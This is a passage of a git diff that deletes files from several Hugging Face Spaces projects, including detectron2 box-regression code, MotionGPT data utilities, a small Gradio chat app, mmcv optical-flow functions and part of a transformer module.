math.log(1000.0 / 16) - - -__all__ = ["Box2BoxTransform", "Box2BoxTransformRotated", "Box2BoxTransformLinear"] - - -@torch.jit.script -class Box2BoxTransform(object): - """ - The box-to-box transform defined in R-CNN. The transformation is parameterized - by 4 deltas: (dx, dy, dw, dh). The transformation scales the box's width and height - by exp(dw), exp(dh) and shifts a box's center by the offset (dx * width, dy * height). - """ - - def __init__( - self, weights: Tuple[float, float, float, float], scale_clamp: float = _DEFAULT_SCALE_CLAMP - ): - """ - Args: - weights (4-element tuple): Scaling factors that are applied to the - (dx, dy, dw, dh) deltas. In Fast R-CNN, these were originally set - such that the deltas have unit variance; now they are treated as - hyperparameters of the system. - scale_clamp (float): When predicting deltas, the predicted box scaling - factors (dw and dh) are clamped such that they are <= scale_clamp. - """ - self.weights = weights - self.scale_clamp = scale_clamp - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx, dy, dw, dh) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true (unless - any delta is too large and is clamped). - - Args: - src_boxes (Tensor): source boxes, e.g., object proposals - target_boxes (Tensor): target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_widths = src_boxes[:, 2] - src_boxes[:, 0] - src_heights = src_boxes[:, 3] - src_boxes[:, 1] - src_ctr_x = src_boxes[:, 0] + 0.5 * src_widths - src_ctr_y = src_boxes[:, 1] + 0.5 * src_heights - - target_widths = target_boxes[:, 2] - target_boxes[:, 0] - target_heights = target_boxes[:, 3] - target_boxes[:, 1] - target_ctr_x = target_boxes[:, 0] + 0.5 * target_widths - target_ctr_y = target_boxes[:, 1] + 0.5 * target_heights - - wx, wy, ww, wh = self.weights - dx = wx * (target_ctr_x - src_ctr_x) / src_widths - dy = wy * (target_ctr_y - src_ctr_y) / src_heights - dw = ww * torch.log(target_widths / src_widths) - dh = wh * torch.log(target_heights / src_heights) - - deltas = torch.stack((dx, dy, dw, dh), dim=1) - assert (src_widths > 0).all().item(), "Input boxes to Box2BoxTransform are not valid!" - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx, dy, dw, dh) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*4), where k >= 1. - deltas[i] represents k potentially different class-specific - box transformations for the single box boxes[i]. - boxes (Tensor): boxes to transform, of shape (N, 4) - """ - deltas = deltas.float() # ensure fp32 for decoding precision - boxes = boxes.to(deltas.dtype) - - widths = boxes[:, 2] - boxes[:, 0] - heights = boxes[:, 3] - boxes[:, 1] - ctr_x = boxes[:, 0] + 0.5 * widths - ctr_y = boxes[:, 1] + 0.5 * heights - - wx, wy, ww, wh = self.weights - dx = deltas[:, 0::4] / wx - dy = deltas[:, 1::4] / wy - dw = deltas[:, 2::4] / ww - dh = deltas[:, 3::4] / wh - - # Prevent sending too large values into torch.exp() - dw = torch.clamp(dw, max=self.scale_clamp) - dh = torch.clamp(dh, max=self.scale_clamp) - - pred_ctr_x = dx * widths[:, None] + ctr_x[:, None] - pred_ctr_y = dy * heights[:, None] + ctr_y[:, None] - pred_w = torch.exp(dw) * widths[:, None] - pred_h = torch.exp(dh) * heights[:, None] - - x1 = pred_ctr_x - 0.5 * pred_w - y1 = pred_ctr_y - 0.5 * pred_h - x2 = pred_ctr_x + 0.5 * pred_w - y2 = pred_ctr_y + 0.5 * pred_h - pred_boxes = torch.stack((x1, y1, x2, y2), dim=-1) - return pred_boxes.reshape(deltas.shape) - - -@torch.jit.script -class Box2BoxTransformRotated(object): - """ - The box-to-box transform defined in Rotated R-CNN. The transformation is parameterized - by 5 deltas: (dx, dy, dw, dh, da). The transformation scales the box's width and height - by exp(dw), exp(dh), shifts a box's center by the offset (dx * width, dy * height), - and rotate a box's angle by da (radians). - Note: angles of deltas are in radians while angles of boxes are in degrees. - """ - - def __init__( - self, - weights: Tuple[float, float, float, float, float], - scale_clamp: float = _DEFAULT_SCALE_CLAMP, - ): - """ - Args: - weights (5-element tuple): Scaling factors that are applied to the - (dx, dy, dw, dh, da) deltas. These are treated as - hyperparameters of the system. - scale_clamp (float): When predicting deltas, the predicted box scaling - factors (dw and dh) are clamped such that they are <= scale_clamp. - """ - self.weights = weights - self.scale_clamp = scale_clamp - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx, dy, dw, dh, da) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true (unless - any delta is too large and is clamped). - - Args: - src_boxes (Tensor): Nx5 source boxes, e.g., object proposals - target_boxes (Tensor): Nx5 target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_ctr_x, src_ctr_y, src_widths, src_heights, src_angles = torch.unbind(src_boxes, dim=1) - - target_ctr_x, target_ctr_y, target_widths, target_heights, target_angles = torch.unbind( - target_boxes, dim=1 - ) - - wx, wy, ww, wh, wa = self.weights - dx = wx * (target_ctr_x - src_ctr_x) / src_widths - dy = wy * (target_ctr_y - src_ctr_y) / src_heights - dw = ww * torch.log(target_widths / src_widths) - dh = wh * torch.log(target_heights / src_heights) - # Angles of deltas are in radians while angles of boxes are in degrees. - # the conversion to radians serve as a way to normalize the values - da = target_angles - src_angles - da = (da + 180.0) % 360.0 - 180.0 # make it in [-180, 180) - da *= wa * math.pi / 180.0 - - deltas = torch.stack((dx, dy, dw, dh, da), dim=1) - assert ( - (src_widths > 0).all().item() - ), "Input boxes to Box2BoxTransformRotated are not valid!" - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx, dy, dw, dh, da) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*5). - deltas[i] represents box transformation for the single box boxes[i]. - boxes (Tensor): boxes to transform, of shape (N, 5) - """ - assert deltas.shape[1] % 5 == 0 and boxes.shape[1] == 5 - - boxes = boxes.to(deltas.dtype).unsqueeze(2) - - ctr_x = boxes[:, 0] - ctr_y = boxes[:, 1] - widths = boxes[:, 2] - heights = boxes[:, 3] - angles = boxes[:, 4] - - wx, wy, ww, wh, wa = self.weights - - dx = deltas[:, 0::5] / wx - dy = deltas[:, 1::5] / wy - dw = deltas[:, 2::5] / ww - dh = deltas[:, 3::5] / wh - da = deltas[:, 4::5] / wa - - # Prevent sending too large values into torch.exp() - dw = torch.clamp(dw, max=self.scale_clamp) - dh = torch.clamp(dh, max=self.scale_clamp) - - pred_boxes = torch.zeros_like(deltas) - pred_boxes[:, 0::5] = dx * widths + ctr_x # x_ctr - pred_boxes[:, 1::5] = dy * heights + ctr_y # y_ctr - pred_boxes[:, 2::5] = torch.exp(dw) * widths # width - pred_boxes[:, 3::5] = torch.exp(dh) * heights # height - - # Following original RRPN implementation, - # angles of deltas are in radians while angles of boxes are in degrees. - pred_angle = da * 180.0 / math.pi + angles - pred_angle = (pred_angle + 180.0) % 360.0 - 180.0 # make it in [-180, 180) - - pred_boxes[:, 4::5] = pred_angle - - return pred_boxes - - -class Box2BoxTransformLinear(object): - """ - The linear box-to-box transform defined in FCOS. The transformation is parameterized - by the distance from the center of (square) src box to 4 edges of the target box. - """ - - def __init__(self, normalize_by_size=True): - """ - Args: - normalize_by_size: normalize deltas by the size of src (anchor) boxes. - """ - self.normalize_by_size = normalize_by_size - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx1, dy1, dx2, dy2) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true. - The center of src must be inside target boxes. - - Args: - src_boxes (Tensor): square source boxes, e.g., anchors - target_boxes (Tensor): target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_ctr_x = 0.5 * (src_boxes[:, 0] + src_boxes[:, 2]) - src_ctr_y = 0.5 * (src_boxes[:, 1] + src_boxes[:, 3]) - - target_l = src_ctr_x - target_boxes[:, 0] - target_t = src_ctr_y - target_boxes[:, 1] - target_r = target_boxes[:, 2] - src_ctr_x - target_b = target_boxes[:, 3] - src_ctr_y - - deltas = torch.stack((target_l, target_t, target_r, target_b), dim=1) - if self.normalize_by_size: - stride_w = src_boxes[:, 2] - src_boxes[:, 0] - stride_h = src_boxes[:, 3] - src_boxes[:, 1] - strides = torch.stack([stride_w, stride_h, stride_w, stride_h], axis=1) - deltas = deltas / strides - - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx1, dy1, dx2, dy2) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*4), where k >= 1. - deltas[i] represents k potentially different class-specific - box transformations for the single box boxes[i]. - boxes (Tensor): boxes to transform, of shape (N, 4) - """ - # Ensure the output is a valid box. See Sec 2.1 of https://arxiv.org/abs/2006.09214 - deltas = F.relu(deltas) - boxes = boxes.to(deltas.dtype) - - ctr_x = 0.5 * (boxes[:, 0] + boxes[:, 2]) - ctr_y = 0.5 * (boxes[:, 1] + boxes[:, 3]) - if self.normalize_by_size: - stride_w = boxes[:, 2] - boxes[:, 0] - stride_h = boxes[:, 3] - boxes[:, 1] - strides = torch.stack([stride_w, stride_h, stride_w, stride_h], axis=1) - deltas = deltas * strides - - l = deltas[:, 0::4] - t = deltas[:, 1::4] - r = deltas[:, 2::4] - b = deltas[:, 3::4] - - pred_boxes = torch.zeros_like(deltas) - pred_boxes[:, 0::4] = ctr_x[:, None] - l # x1 - pred_boxes[:, 1::4] = ctr_y[:, None] - t # y1 - pred_boxes[:, 2::4] = ctr_x[:, None] + r # x2 - pred_boxes[:, 3::4] = ctr_y[:, None] + b # y2 - return pred_boxes - - -def _dense_box_regression_loss( - anchors: List[Union[Boxes, torch.Tensor]], - box2box_transform: Box2BoxTransform, - pred_anchor_deltas: List[torch.Tensor], - gt_boxes: List[torch.Tensor], - fg_mask: torch.Tensor, - box_reg_loss_type="smooth_l1", - smooth_l1_beta=0.0, -): - """ - Compute loss for dense multi-level box regression. - Loss is accumulated over ``fg_mask``. - - Args: - anchors: #lvl anchor boxes, each is (HixWixA, 4) - pred_anchor_deltas: #lvl predictions, each is (N, HixWixA, 4) - gt_boxes: N ground truth boxes, each has shape (R, 4) (R = sum(Hi * Wi * A)) - fg_mask: the foreground boolean mask of shape (N, R) to compute loss on - box_reg_loss_type (str): Loss type to use. Supported losses: "smooth_l1", "giou", - "diou", "ciou". - smooth_l1_beta (float): beta parameter for the smooth L1 regression loss. Default to - use L1 loss. Only used when `box_reg_loss_type` is "smooth_l1" - """ - if isinstance(anchors[0], Boxes): - anchors = type(anchors[0]).cat(anchors).tensor # (R, 4) - else: - anchors = cat(anchors) - if box_reg_loss_type == "smooth_l1": - gt_anchor_deltas = [box2box_transform.get_deltas(anchors, k) for k in gt_boxes] - gt_anchor_deltas = torch.stack(gt_anchor_deltas) # (N, R, 4) - loss_box_reg = smooth_l1_loss( - cat(pred_anchor_deltas, dim=1)[fg_mask], - gt_anchor_deltas[fg_mask], - beta=smooth_l1_beta, - reduction="sum", - ) - elif box_reg_loss_type == "giou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = giou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - elif box_reg_loss_type == "diou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = diou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - elif box_reg_loss_type == "ciou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = ciou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - else: - raise ValueError(f"Invalid dense box regression loss type '{box_reg_loss_type}'") - return loss_box_reg diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md deleted file mode 100644 index 0174b7dd528efcaa0fe27d46f40a3866f03e7c41..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md +++ /dev/null @@ -1,17 +0,0 @@ - -## To build a cu101 wheel for release: - -``` -$ nvidia-docker run -it --storage-opt "size=20GB" --name pt pytorch/manylinux-cuda101 -# inside the container: -# git clone https://github.com/facebookresearch/detectron2/ -# cd detectron2 -# export CU_VERSION=cu101 D2_VERSION_SUFFIX= PYTHON_VERSION=3.7 PYTORCH_VERSION=1.8 -# ./dev/packaging/build_wheel.sh -``` - -## To build all wheels for combinations of CUDA and Python -``` -./dev/packaging/build_all_wheels.sh -./dev/packaging/gen_wheel_index.sh /path/to/wheels -``` diff --git a/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py b/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py deleted file mode 100644 index 30714ff6562edd5136e93107fea10c25b4449c79..0000000000000000000000000000000000000000 --- a/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py +++ /dev/null @@ -1,81 +0,0 @@ -import torch -import rich -import pickle -import numpy as np - - -def lengths_to_mask(lengths): - max_len = max(lengths) - mask = torch.arange(max_len, device=lengths.device).expand( - len(lengths), max_len) < lengths.unsqueeze(1) - return mask - - -# padding to max length in one batch -def collate_tensors(batch): - if isinstance(batch[0], np.ndarray): - batch = [torch.tensor(b).float() for b in batch] - - dims = batch[0].dim() - max_size = [max([b.size(i) for b in batch]) for i in range(dims)] - size = (len(batch), ) + tuple(max_size) - canvas = batch[0].new_zeros(size=size) - for i, b in enumerate(batch): - sub_tensor = canvas[i] - for d in range(dims): - sub_tensor = sub_tensor.narrow(d, 0, b.size(d)) - sub_tensor.add_(b) - return canvas - -def humanml3d_collate(batch): - notnone_batches = [b for b in batch if b is not None] - EvalFlag = False if notnone_batches[0][5] is None else True - - # Sort by text length - if EvalFlag: - notnone_batches.sort(key=lambda x: x[5], reverse=True) - - # Motion only - adapted_batch = { - "motion": - collate_tensors([torch.tensor(b[1]).float() for b in notnone_batches]), - "length": [b[2] for b in notnone_batches], - } - - # Text and motion - if notnone_batches[0][0] is not None: - adapted_batch.update({ - "text": [b[0] for b in notnone_batches], - "all_captions": [b[7] for b in notnone_batches], - }) - - # Evaluation related - if EvalFlag: - adapted_batch.update({ - "text": [b[0] for b in notnone_batches], - "word_embs": - collate_tensors( - [torch.tensor(b[3]).float() for b in notnone_batches]), - "pos_ohot": - collate_tensors( - [torch.tensor(b[4]).float() for b in notnone_batches]), - "text_len": - collate_tensors([torch.tensor(b[5]) for b in notnone_batches]), - "tokens": [b[6] for b in notnone_batches], - }) - - # Tasks - if len(notnone_batches[0]) == 9: - adapted_batch.update({"tasks": [b[8] for b in notnone_batches]}) - - return adapted_batch - - -def load_pkl(path, description=None, progressBar=False): - if progressBar: - with rich.progress.open(path, 'rb', description=description) as file: - data = pickle.load(file) - else: - with open(path, 'rb') as file: - data = pickle.load(file) - return data diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go deleted file mode 100644 index c7df51fae61bbedf43545367a744dc8b1ad73e21..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go and /dev/null differ diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go deleted file mode 100644 index 75ae584c7a56dcddb9385edebad18a52e8d7702e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go and /dev/null differ diff --git a/spaces/PhilSpiel/storyville/app.py b/spaces/PhilSpiel/storyville/app.py deleted file mode 100644 index 4cec0ca64271aee0bd19b152697597908499fa9b..0000000000000000000000000000000000000000 --- a/spaces/PhilSpiel/storyville/app.py +++ /dev/null @@ -1,30 +0,0 @@ -import openai -import gradio as gr -import os - -# openai API key -openai.api_key = os.getenv("OPENAPI_KEY") # Replace with your key - -def predict(message, history): - history_openai_format = [{"role": "system", "content":os.getenv("PROMPT")}] - for human, system in history: - history_openai_format.append({"role": "assistant", "content":os.getenv("PROMPT")}) - history_openai_format.append({"role": "user", "content": human }) - history_openai_format.append({"role": "user", "content": message}) - - response = openai.ChatCompletion.create( - model='gpt-3.5-turbo-1106', - messages= history_openai_format, - temperature=0.5, - frequency_penalty=1.54, - stream=True - ) - - partial_message = "" - for chunk in response: - if len(chunk['choices'][0]['delta']) != 0: - partial_message = partial_message + chunk['choices'][0]['delta']['content'] - yield partial_message - - -gr.ChatInterface(predict, submit_btn="Chat with the Ladies").queue().launch(share=True) \ No newline at end of file diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py deleted file mode 100644 index 84160f8d6ef9fceb5a2f89e7481593109fc1905d..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py +++ /dev/null @@ -1,254 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import warnings - -import cv2 -import numpy as np - -from annotator.uniformer.mmcv.arraymisc import dequantize, quantize -from annotator.uniformer.mmcv.image import imread, imwrite -from annotator.uniformer.mmcv.utils import is_str - - -def flowread(flow_or_path, quantize=False, concat_axis=0, *args, **kwargs): - """Read an optical flow map. - - Args: - flow_or_path (ndarray or str): A flow map or filepath. - quantize (bool): whether to read quantized pair, if set to True, - remaining args will be passed to :func:`dequantize_flow`. - concat_axis (int): The axis that dx and dy are concatenated, - can be either 0 or 1. Ignored if quantize is False. - - Returns: - ndarray: Optical flow represented as a (h, w, 2) numpy array - """ - if isinstance(flow_or_path, np.ndarray): - if (flow_or_path.ndim != 3) or (flow_or_path.shape[-1] != 2): - raise ValueError(f'Invalid flow with shape {flow_or_path.shape}') - return flow_or_path - elif not is_str(flow_or_path): - raise TypeError(f'"flow_or_path" must be a filename or numpy array, ' - f'not {type(flow_or_path)}') - - if not quantize: - with open(flow_or_path, 'rb') as f: - try: - header = f.read(4).decode('utf-8') - except Exception: - raise IOError(f'Invalid flow file: {flow_or_path}') - else: - if header != 'PIEH': - raise IOError(f'Invalid flow file: {flow_or_path}, ' - 'header does not contain PIEH') - - w = np.fromfile(f, np.int32, 1).squeeze() - h = np.fromfile(f, np.int32, 1).squeeze() - flow = np.fromfile(f, np.float32, w * h * 2).reshape((h, w, 2)) - else: - assert concat_axis in [0, 1] - cat_flow = imread(flow_or_path, flag='unchanged') - if cat_flow.ndim != 2: - raise IOError( - f'{flow_or_path} is not a valid quantized flow file, ' - f'its dimension is {cat_flow.ndim}.') - assert cat_flow.shape[concat_axis] % 2 == 0 - dx, dy = np.split(cat_flow, 2, axis=concat_axis) - flow = dequantize_flow(dx, dy, *args, **kwargs) - - return flow.astype(np.float32) - - -def flowwrite(flow, filename, quantize=False, concat_axis=0, *args, **kwargs): - """Write optical flow to file. - - If the flow is not quantized, it will be saved as a .flo file losslessly, - otherwise a jpeg image which is lossy but of much smaller size. (dx and dy - will be concatenated horizontally into a single image if quantize is True.) - - Args: - flow (ndarray): (h, w, 2) array of optical flow. - filename (str): Output filepath. - quantize (bool): Whether to quantize the flow and save it to 2 jpeg - images. If set to True, remaining args will be passed to - :func:`quantize_flow`. - concat_axis (int): The axis that dx and dy are concatenated, - can be either 0 or 1. Ignored if quantize is False. - """ - if not quantize: - with open(filename, 'wb') as f: - f.write('PIEH'.encode('utf-8')) - np.array([flow.shape[1], flow.shape[0]], dtype=np.int32).tofile(f) - flow = flow.astype(np.float32) - flow.tofile(f) - f.flush() - else: - assert concat_axis in [0, 1] - dx, dy = quantize_flow(flow, *args, **kwargs) - dxdy = np.concatenate((dx, dy), axis=concat_axis) - imwrite(dxdy, filename) - - -def quantize_flow(flow, max_val=0.02, norm=True): - """Quantize flow to [0, 255]. - - After this step, the size of flow will be much smaller, and can be - dumped as jpeg images. - - Args: - flow (ndarray): (h, w, 2) array of optical flow. - max_val (float): Maximum value of flow, values beyond - [-max_val, max_val] will be truncated. - norm (bool): Whether to divide flow values by image width/height. - - Returns: - tuple[ndarray]: Quantized dx and dy. - """ - h, w, _ = flow.shape - dx = flow[..., 0] - dy = flow[..., 1] - if norm: - dx = dx / w # avoid inplace operations - dy = dy / h - # use 255 levels instead of 256 to make sure 0 is 0 after dequantization. - flow_comps = [ - quantize(d, -max_val, max_val, 255, np.uint8) for d in [dx, dy] - ] - return tuple(flow_comps) - - -def dequantize_flow(dx, dy, max_val=0.02, denorm=True): - """Recover from quantized flow. - - Args: - dx (ndarray): Quantized dx. - dy (ndarray): Quantized dy. - max_val (float): Maximum value used when quantizing. - denorm (bool): Whether to multiply flow values with width/height. - - Returns: - ndarray: Dequantized flow. - """ - assert dx.shape == dy.shape - assert dx.ndim == 2 or (dx.ndim == 3 and dx.shape[-1] == 1) - - dx, dy = [dequantize(d, -max_val, max_val, 255) for d in [dx, dy]] - - if denorm: - dx *= dx.shape[1] - dy *= dx.shape[0] - flow = np.dstack((dx, dy)) - return flow - - -def flow_warp(img, flow, filling_value=0, interpolate_mode='nearest'): - """Use flow to warp img. - - Args: - img (ndarray, float or uint8): Image to be warped. - flow (ndarray, float): Optical Flow. - filling_value (int): The missing pixels will be set with filling_value. - interpolate_mode (str): bilinear -> Bilinear Interpolation; - nearest -> Nearest Neighbor. - - Returns: - ndarray: Warped image with the same shape of img - """ - warnings.warn('This function is just for prototyping and cannot ' - 'guarantee the computational efficiency.') - assert flow.ndim == 3, 'Flow must be in 3D arrays.' - height = flow.shape[0] - width = flow.shape[1] - channels = img.shape[2] - - output = np.ones( - (height, width, channels), dtype=img.dtype) * filling_value - - grid = np.indices((height, width)).swapaxes(0, 1).swapaxes(1, 2) - dx = grid[:, :, 0] + flow[:, :, 1] - dy = grid[:, :, 1] + flow[:, :, 0] - sx = np.floor(dx).astype(int) - sy = np.floor(dy).astype(int) - valid = (sx >= 0) & (sx < height - 1) & (sy >= 0) & (sy < width - 1) - - if interpolate_mode == 'nearest': - output[valid, :] = img[dx[valid].round().astype(int), - dy[valid].round().astype(int), :] - elif interpolate_mode == 'bilinear': - # dirty walkround for integer positions - eps_ = 1e-6 - dx, dy = dx + eps_, dy + eps_ - left_top_ = img[np.floor(dx[valid]).astype(int), - np.floor(dy[valid]).astype(int), :] * ( - np.ceil(dx[valid]) - dx[valid])[:, None] * ( - np.ceil(dy[valid]) - dy[valid])[:, None] - left_down_ = img[np.ceil(dx[valid]).astype(int), - np.floor(dy[valid]).astype(int), :] * ( - dx[valid] - np.floor(dx[valid]))[:, None] * ( - np.ceil(dy[valid]) - dy[valid])[:, None] - right_top_ = img[np.floor(dx[valid]).astype(int), - np.ceil(dy[valid]).astype(int), :] * ( - np.ceil(dx[valid]) - dx[valid])[:, None] * ( - dy[valid] - np.floor(dy[valid]))[:, None] - right_down_ = img[np.ceil(dx[valid]).astype(int), - np.ceil(dy[valid]).astype(int), :] * ( - dx[valid] - np.floor(dx[valid]))[:, None] * ( - dy[valid] - np.floor(dy[valid]))[:, None] - output[valid, :] = left_top_ + left_down_ + right_top_ + right_down_ - else: - raise NotImplementedError( - 'We only support interpolation modes of nearest and bilinear, ' - f'but got {interpolate_mode}.') - return output.astype(img.dtype) - - -def flow_from_bytes(content): - """Read dense optical flow from bytes. - - .. note:: - This load optical flow function works for FlyingChairs, FlyingThings3D, - Sintel, FlyingChairsOcc datasets, but cannot load the data from - ChairsSDHom. - - Args: - content (bytes): Optical flow bytes got from files or other streams. - - Returns: - ndarray: Loaded optical flow with the shape (H, W, 2). - """ - - # header in first 4 bytes - header = content[:4] - if header.decode('utf-8') != 'PIEH': - raise Exception('Flow file header does not contain PIEH') - # width in second 4 bytes - width = np.frombuffer(content[4:], np.int32, 1).squeeze() - # height in third 4 bytes - height = np.frombuffer(content[8:], np.int32, 1).squeeze() - # after first 12 bytes, all bytes are flow - flow = np.frombuffer(content[12:], np.float32, width * height * 2).reshape( - (height, width, 2)) - - return flow - - -def sparse_flow_from_bytes(content): - """Read the optical flow in KITTI datasets from bytes. - - This function is modified from RAFT load the `KITTI datasets - `_. - - Args: - content (bytes): Optical flow bytes got from files or other streams. - - Returns: - Tuple(ndarray, ndarray): Loaded optical flow with the shape (H, W, 2) - and flow valid mask with the shape (H, W). - """ # nopa - - content = np.frombuffer(content, np.uint8) - flow = cv2.imdecode(content, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR) - flow = flow[:, :, ::-1].astype(np.float32) - # flow shape (H, W, 2) valid shape (H, W) - flow, valid = flow[:, :, :2], flow[:, :, 2] - flow = (flow - 2**15) / 64.0 - return flow, valid diff --git a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/__init__.py b/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py b/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py deleted file mode 100644 index 707e9ebaea2be706427b8eb663e75ef9d46c5de7..0000000000000000000000000000000000000000 --- a/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py +++ /dev/null @@ -1,219 +0,0 @@ -from functools import partial - -import torch -import torch.nn.functional as F -from einops import rearrange -from rotary_embedding_torch import RotaryEmbedding, broadcat -from torch import nn - - -# helpers - - -def exists(val): - return val is not None - - -def default(val, d): - return val if exists(val) else d - - -def cast_tuple(val, depth = 1): - if isinstance(val, list): - val = tuple(val) - return val if isinstance(val, tuple) else (val,) * depth - - -def max_neg_value(t): - return -torch.finfo(t.dtype).max - - -def stable_softmax(t, dim = -1, alpha = 32 ** 2): - t = t / alpha - t = t - torch.amax(t, dim = dim, keepdim = True).detach() - return (t * alpha).softmax(dim = dim) - - -def route_args(router, args, depth): - routed_args = [(dict(), dict()) for _ in range(depth)] - matched_keys = [key for key in args.keys() if key in router] - - for key in matched_keys: - val = args[key] - for depth, ((f_args, g_args), routes) in enumerate(zip(routed_args, router[key])): - new_f_args, new_g_args = map(lambda route: ({key: val} if route else {}), routes) - routed_args[depth] = ({**f_args, **new_f_args}, {**g_args, **new_g_args}) - return routed_args - - -# classes -class SequentialSequence(nn.Module): - def __init__(self, layers, args_route = {}, layer_dropout = 0.): - super().__init__() - assert all(len(route) == len(layers) for route in args_route.values()), 'each argument route map must have the same depth as the number of sequential layers' - self.layers = layers - self.args_route = args_route - self.layer_dropout = layer_dropout - - def forward(self, x, **kwargs): - args = route_args(self.args_route, kwargs, len(self.layers)) - layers_and_args = list(zip(self.layers, args)) - - for (f, g), (f_args, g_args) in layers_and_args: - x = x + f(x, **f_args) - x = x + g(x, **g_args) - return x - - -class DivideMax(nn.Module): - def __init__(self, dim): - super().__init__() - self.dim = dim - - def forward(self, x): - maxes = x.amax(dim = self.dim, keepdim = True).detach() - return x / maxes - - -# https://arxiv.org/abs/2103.17239 -class LayerScale(nn.Module): - def __init__(self, dim, depth, fn): - super().__init__() - if depth <= 18: - init_eps = 0.1 - elif depth > 18 and depth <= 24: - init_eps = 1e-5 - else: - init_eps = 1e-6 - - scale = torch.zeros(1, 1, dim).fill_(init_eps) - self.scale = nn.Parameter(scale) - self.fn = fn - def forward(self, x, **kwargs): - return self.fn(x, **kwargs) * self.scale - -# layer norm - - -class PreNorm(nn.Module): - def __init__(self, dim, fn, sandwich = False): - super().__init__() - self.norm = nn.LayerNorm(dim) - self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity() - self.fn = fn - - def forward(self, x, **kwargs): - x = self.norm(x) - x = self.fn(x, **kwargs) - return self.norm_out(x) - -# feed forward - - -class GEGLU(nn.Module): - def forward(self, x): - x, gates = x.chunk(2, dim = -1) - return x * F.gelu(gates) - - -class FeedForward(nn.Module): - def __init__(self, dim, dropout = 0., mult = 4.): - super().__init__() - self.net = nn.Sequential( - nn.Linear(dim, dim * mult * 2), - GEGLU(), - nn.Dropout(dropout), - nn.Linear(dim * mult, dim) - ) - - def forward(self, x): - return self.net(x) - -# Attention - - -class Attention(nn.Module): - def __init__(self, dim, seq_len, causal = True, heads = 8, dim_head = 64, dropout = 0.): - super().__init__() - inner_dim = dim_head * heads - self.heads = heads - self.seq_len = seq_len - self.scale = dim_head ** -0.5 - - self.causal = causal - - self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) - self.to_out = nn.Sequential( - nn.Linear(inner_dim, dim), - nn.Dropout(dropout) - ) - - def forward(self, x, mask = None): - b, n, _, h, device = *x.shape, self.heads, x.device - softmax = torch.softmax - - qkv = self.to_qkv(x).chunk(3, dim = -1) - q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) - - q = q * self.scale - - dots = torch.einsum('b h i d, b h j d -> b h i j', q, k) - mask_value = 